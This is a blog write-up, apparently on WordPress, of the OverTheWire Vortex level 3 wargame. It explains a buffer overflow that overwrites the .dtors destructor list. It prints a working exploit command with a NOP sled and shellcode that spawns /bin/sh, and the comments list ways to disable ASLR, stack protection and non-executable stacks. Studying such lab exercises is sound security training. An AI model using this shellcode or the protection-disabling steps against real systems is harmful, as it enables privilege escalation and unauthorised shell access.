Overthewire Vortex Level3

You can find a very detailed description of this level on the following blog.

This level is a bit harder, because you not only have to take control over the execution flow, but you must provide the missing functionality for raising the privilege level and starting a shell. So you will inject some code using the buffer, and redirect the execution flow to execute this code.

Solving the level (in big steps):

  • you should read the doc about the .dtors section
  • you should also read the phrack article about buffer overflows
  • you must understand(!), what the code is doing
  • i think you’ve guessed now, that you will overflow the buffer, and overwrite lpp variable
  • as you can see the start address of the buffer will be written into **lpp
  • that situation is ideal to put the shellcode into the buffer and point **lpp to the end of the destructor list (we want override this address)
  • so we only have to find a memory address which points to the ”end of the destructor list” entry
  • if we found the address, we have to put the shellcode into the buffer, and overflow lpp with the address of the memory cell we found

I’ve used the following:

  • 52 byte nop sled
  • shellcode borrowed from the above mentioned site (you can use your own, or download one from exploit-db)
  • i was really lazy to calculate the exact address of lpp, so i’m writing the address a lot of times, which will reach lpp as well

/vortex/level3 `python -c 'print "\x90"*52 + \
"\xeb\x2b\x5e\x31\xc0\xb0\x46\x31\xdb\x66\xbb\xfa\x01\x31\xc9\x66" +
"\xb9\xfa\x01\xcd\x80\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89" +
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xd0\xff\xff" +
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff\xff\xff"+
"\x98\x94\x04\x08"*30'`
********
Advertisements
This entry was posted in Wargame and tagged , , . Bookmark the permalink.

5 Responses to Overthewire Vortex Level3

  1. Rob says:

    I created a very similar solution, with slightly different shellcode though. I did have one problem however, maybe you have a solution to that – the binaries on the wargame server are compiled without any type of “modern” protection, so that I was unable to create a similarly vulnerable binary on my local machine using up to date gcc etc. Turning off stack protection isn’t the problem because this can be achieved by using -fno-stack-protector, but the binaries I get have other features like hidden sections which cannot be overwritten. Do you have any idea how to intentionally compile and link a binary which is as similar as possible to the ones on the wargame environment? (Let’s say I don’t want to scp the binary to my local box) 😉

    • axtaxt says:

      I’m usually compiling and running my binaries on the OTW server, or scp-ing them to my local box.

      If you want to play with them locally, you first have to disable ASLR:

      echo 0 > /proc/sys/kernel/randomize_va_space

      Then try to disable noexec stack:

      execstack -s

      or compile with, the following linker option:

      -Wl,-z execstack

      Of course you will need

      -fno-stack-protector -U_FORTIFY_SOURCE

      Fun thing what I’ve heard about, but never tried it, is that instead of

      memcpy(destination, source, size)

      use

      (memcpy) memcpy(destination, source, size)

      which disables a few checking macros.

    • axtaxt says:

      I’ve just googled it, and found as an extra option:

      -fno-mudflap

  2. chris says:

    As far as i know, even you are able to overwrite the ,.dtor section (i.e., compiled with no-relro), it is meaningless because the destructor is never invoked.

    • axtaxt says:

      Hi chris. Why do you think, that the destructors are not invoked? Try this simple example:

      #include <stdio.h>
      __attribute__((constructor)) static void C() { printf("CTOR\n"); }
      __attribute__((destructor)) static void D() { printf("DTOR\n"); }
      int main() { printf("MAIN\n"); }
      

      It produces:

      CTOR
      MAIN
      DTOR
      

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s